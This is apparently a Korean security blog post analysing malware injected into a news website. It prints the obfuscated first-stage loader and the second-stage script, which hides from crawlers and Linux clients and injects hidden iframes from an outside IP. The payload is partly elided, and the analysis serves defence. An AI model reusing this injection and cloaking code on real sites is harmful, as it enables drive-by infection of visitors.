
security/악성코드 유포

http://www.inews24.com 악성코드 유포중 !

* 현재 감염된 사이트입니다. 접속 시 감염될 수 있으니 유의하시기 바랍니다!


근원지 : http://www.inews24.com 내 스크립트 !


1차 연결 : http://69.46.86.221/pic/img.js


2차 아이프레임 : http://69.46.86.221/pic/img.js

~> http://69.46.86.221/pic/img.html (404 Not Found)

~> http://69.46.86.221/pic/css.html (익스플로잇 미삽입)


[inews24 내 스크립트]


// Specimen: script found injected into the news site, kept on one line as published.
// The payload string is elided by the author ("[중략]" = middle part omitted).
//
// RDfADFLDEXDFu5(s): decoder. Walks s until it meets '\n', consuming 7 characters
// per output value. Within each group a space sets the corresponding bit
// (weights 2^6 down to 2^0) and any other character leaves it 0, so the payload
// carries one 7-bit value per 7 characters.
// NOTE(review): the elided payload is presumably whitespace-only (space vs. another
// blank character), which would make it invisible in a page source view; confirm
// against the original sample.
//
// r.push(alert(tmp)): as shown, each decoded value is displayed with alert().
// alert() returns undefined, so r.join('') is an empty string and Function('')()
// does nothing in this form.
// NOTE(review): this looks like the analyst's substitution for dumping the numeric
// codes (the decimal list in the decoding section of this page); the live script
// presumably turned tmp into a character instead; confirm.
//
// Execution gate: the decoded text is passed to Function(...)() only while at least
// one of the cookies ERTDSDFF / WERXRF2 is absent. The statements after the `if`
// run on every load: they set ERTDSDFF if it is missing, otherwise WERXRF2, with a
// 24-hour expiry. A browser that keeps cookies therefore runs the payload on at
// most two page loads per 24 hours, which makes the injection harder to reproduce
// on a repeat visit.
//
// Indicators visible here: the function name, the two cookie names, and a
// Function(...)() call fed by a decoder applied to a string literal.
function RDfADFLDEXDFu5(s) {var r = new Array();var curr = 0;while(s.charAt(curr) != '\n') {var tmp = 0;for (var i=6; i>=0 ; i-- ){if (s.charAt(curr) == ' '){tmp = tmp | (Math.pow(2,i));}curr++;}r.push(alert(tmp));}return r.join('');}if(document.cookie.indexOf("ERTDSDFF")==-1 || document.cookie.indexOf("WERXRF2")==-1)Function(RDfADFLDEXDFu5(" [중략]\n"))();var cookiename = document.cookie.indexOf("ERTDSDFF") == -1 ? "ERTDSDFF" : "WERXRF2";var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie=cookiename+"=Yes;path=/;expires="+expires.toGMTString();

-----------------------------------------------------------------------------------------------


[디코딩]


100,111,99,117,109,101,110,116,46,119,114,105,116,[생략],34,41,41,59


~> document.write(unescape("%3Cscript%20sr[생략]t%3E"));

~> <script src=http://69.46.86.221/pic/img.js></script> 연결 !


[img.js 스크립트]


// Specimen: second-stage script (img.js) as published. It decides whether to
// inject two hidden iframes, based on a cookie and the browser's User-Agent.

// User-Agent is lower-cased once; every substring test below runs on this copy.
var DkilOy=navigator.userAgent.toLowerCase();

// Gate: proceed only if the AdVvKHCY cookie is absent and the User-Agent contains
// none of "bot", "spider", "linux". This keeps crawlers and Linux clients from
// receiving the iframes, so automated scanners matching those strings see a clean page.
// The last test looks for "Safari" with a capital S in an already lower-cased
// string, so it can never match and always yields -1. As written, that clause
// excludes nothing, and browsers whose User-Agent contains "Safari" pass the gate.
if(document.cookie.indexOf("AdVvKHCY")==-1 && DkilOy.indexOf("bot")==-1 && DkilOy.indexOf("spider")==-1 && DkilOy.indexOf("linux")==-1&& DkilOy.indexOf("Safari")==-1)

{

var expires=new Date();

// 24 hours from now, in milliseconds.
expires.setTime(expires.getTime()+24*60*60*1000);

// Marker cookie: with it set, the gate above fails for the next 24 hours, so the
// iframes are written at most once per day per browser that keeps cookies.
document.cookie="AdVvKHCY=Yes;path=/;expires="+expires.toGMTString();

// Two borderless 116x1 iframes are written into the page. Per the analyst's notes
// on this page, img.html answered 404 and css.html held no exploit when checked.
document.write("<iframe width=\"116\" height=\"1\" frameborder=\"0\" src=\"http://69.46.86.221/pic/img.html\"></iframe>");

document.write("<iframe width=\"116\" height=\"1\" frameborder=\"0\" src=\"http://69.46.86.221/pic/css.html\"></iframe>");

}


-----------------------------------------------------------------------------------------------


http://69.46.86.221/pic/img.html


=========================

Server IP(s):

0.0.0.0

=========================

HTTP headers: 

HTTP/1.1 404 Not Found


http://69.46.86.221/pic/css.html ~> 익스플로잇 미삽입!